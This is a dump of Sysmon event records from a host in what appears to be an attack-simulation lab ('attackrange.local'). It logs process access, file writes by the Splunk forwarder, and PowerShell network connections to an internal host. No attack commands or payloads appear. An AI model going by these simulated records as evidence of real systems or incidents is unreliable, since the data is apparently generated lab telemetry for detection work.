10341000x800000000000000035085969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.850{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.850{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.850{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.571{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A7992F830620EB67651B608BB68BD0F1,SHA256=BE5590E8DCDC246D87016E2932C0CBBCB5B2A946F71BC463527AE8EBBE7A7F57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.535{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D062A4ECC83D62BBCE4B4D820122B985,SHA256=1D17356F176FCA292650497947822D62114AFA2248B6B1FF7238799EAD8A2E66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:32.450{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3152E643F4509191F83E77E477DE7353,SHA256=6DE8188FE23F71644E3C5EDB5D7540CB6F71767335C98CA8F3F624ADAE445E84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:57.882{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56781-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:33.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=684FBAD8242B0A51A822FE2D36B61089,SHA256=697046DC8FCBEF604A018D0D91B6F2F5139F1BD6A69C915464A327D22ECB3034,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:34.502{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA906ACA621208E48DFEADE94668477,SHA256=13D8C40DE17DFB4D58B082002631BA52DA04F2A622AA330B5A53CA2E7FE3D9F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:58.113{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56782-false10.0.1.12-8000- 23542300x800000000000000035085972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:34.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1753594DD33CBA30E1FEDDBE2F33EC0F,SHA256=44B6904A7287D89663F272F0741ED71A4F057924972F75113F3C66D95756975F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:35.532{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED991FD83C752D8B5429D20CE181479A,SHA256=DF935A256501028FDF3D35BDAD14C07444174135F0F296CB534E5AD62E3B98F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:36.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3E2DB40805691A8822BF887FDB6E7C,SHA256=8DBD6786CAE867FB2102F608C3AF01839609BE718993534D3488B7429224D6B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:36.447{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=EDB17AFA8F2B3A0EF8A2C71F7A2B6AAD,SHA256=931A6A00BBBD9EB15880C12843ABD93731E3A8DCF633B6E6844AFA416388259A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:37.564{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA958142D116D907B7EC447E7377E995,SHA256=BE47F231568CA66694158AC6C85E777A514D2725A2F50931439DE3236FE77EE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:38.629{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C55D6FF6375E56E85F005E018FC7611,SHA256=BBF285CCB80380E8D8192D9478E15F65CAE36979AC3BE3AC62A933067C4C3239,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:39.644{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F08552902E55CD5B00B27DC66B8FFCAD,SHA256=C543B729F066DA8C6915223CFCCA277DDBD3AD510A057375BA756C570FD9FAE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:03.171{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56783-false10.0.1.12-8000- 23542300x800000000000000035085984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:40.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7364B6E13F5171E4D6F240C3E4D51102,SHA256=DE186129B355CB18064E466F4759E0A21A433CEF745D3B319545792DDD0ECDFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:04.855{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56784-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:39.997{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1A03CCE64B2F137EC3DA2BDA2AB517D7,SHA256=4B9FDADD40C0387AF47605DFD993013588DCD50EDD8F41F4B8666F0184E8DB31,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:41.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65050DF3B5A2CCD9CB04651C699A91D9,SHA256=BBA3090113FB3EF3431785FF1ACE98E81383E387217A303551802B89F09C57A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:42.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB4D489004025C1DFA56E8896590558B,SHA256=38FF313DA0123C4CFB40D79BB036EBD66746CADD1CA5E49C9330BC94F6B8B343,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.777{B81B27B7-4FC7-613A-7990-03000000C801}65325416C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.708{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77C48C585523D7C0E6E2C4A29B74BFC,SHA256=563F0E3F8DC1825A7C3A3C45CFBDF13886E1477539367CB80F50110765FC45FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.592{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:43.578{B81B27B7-4FC7-613A-7990-03000000C801}6532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA37CABFF967386E5DBDD6C6799E0D0E,SHA256=42A80732C16007B3339A34EFCA6D0B336A05A4653D68EF662281F875DBAFE719,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D747F8D5A4506A9A8EB625670E64DA47,SHA256=CB3BF189FBEB79A61CCDD81FBAE77243E5FD52614F31B70899947535EE58507E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FC8-613A-7B90-03000000C801}1032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:44.739{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 